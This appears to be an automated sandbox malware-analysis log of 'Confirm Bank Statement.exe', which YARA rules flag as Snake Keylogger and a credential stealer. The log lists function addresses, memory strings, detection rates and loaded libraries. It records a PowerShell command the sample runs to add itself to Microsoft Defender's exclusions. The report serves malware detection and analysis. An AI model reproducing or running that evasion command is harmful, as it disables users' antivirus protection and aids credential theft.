                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B57E594_2_00B57E59
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02876A204_2_02876A20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028777704_2_02877770
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287AF784_2_0287AF78
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02871C584_2_02871C58
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028715F84_2_028715F8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028745004_2_02874500
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287FA834_2_0287FA83
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287FA884_2_0287FA88
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02872AE04_2_02872AE0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02872AF04_2_02872AF0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287D22F4_2_0287D22F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287D2384_2_0287D238
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287A26F4_2_0287A26F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287A2704_2_0287A270
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287339B4_2_0287339B
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028733A04_2_028733A0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287B3C14_2_0287B3C1
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287B3D04_2_0287B3D0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287AB1F4_2_0287AB1F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287AB204_2_0287AB20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028740984_2_02874098
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028740A84_2_028740A8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C0CF4_2_0287C0CF
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028708DF4_2_028708DF
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C0D84_2_0287C0D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028708F04_2_028708F0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287001F4_2_0287001F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287B81F4_2_0287B81F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287B8284_2_0287B828
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028700404_2_02870040
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E0684_2_0287E068
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E0784_2_0287E078
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287118F4_2_0287118F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C9884_2_0287C988
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028711A04_2_028711A0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F1D74_2_0287F1D7
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F1D84_2_0287F1D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E9274_2_0287E927
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E9284_2_0287E928
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C97F4_2_0287C97F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287D68B4_2_0287D68B
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287D6904_2_0287D690
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287A6C74_2_0287A6C7
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287A6C84_2_0287A6C8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02879E174_2_02879E17
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02879E184_2_02879E18
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F6204_2_0287F620
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F6304_2_0287F630
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028737E84_2_028737E8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028737F84_2_028737F8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02872F434_2_02872F43
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02872F484_2_02872F48
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287AF734_2_0287AF73
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287BC804_2_0287BC80
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287048A4_2_0287048A
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028704984_2_02870498
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E4CB4_2_0287E4CB
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E4D04_2_0287E4D0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287DC114_2_0287DC11
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287DC204_2_0287DC20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02873C4F4_2_02873C4F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02873C504_2_02873C50
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287BC7F4_2_0287BC7F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287ED804_2_0287ED80
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287CDD04_2_0287CDD0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287CDE04_2_0287CDE0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028715EA4_2_028715EA
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C5204_2_0287C520
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C5304_2_0287C530
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02870D3A4_2_02870D3A
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02870D484_2_02870D48
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287ED7F4_2_0287ED7F
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000000.1251186568.0000000000D1E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewenA.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.0000000003011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.0000000003011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1275355456.0000000007787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1276008487.0000000008DE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1265141545.00000000012BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3718084114.00000000008F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3717562282.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exeBinary or memory string: OriginalFilenamewenA.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Confirm Bank Statement.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@3/3
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirm Bank Statement.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvvfwxyg.1ed.ps1Jump to behavior
                    Source: Confirm Bank Statement.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Confirm Bank Statement.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3721766715.00000000039BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Confirm Bank Statement.exeVirustotal: Detection: 31%
                    Source: Confirm Bank Statement.exeReversingLabs: Detection: 42%
                    Source: unknownProcess created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: mscoree.dllJump to behavior
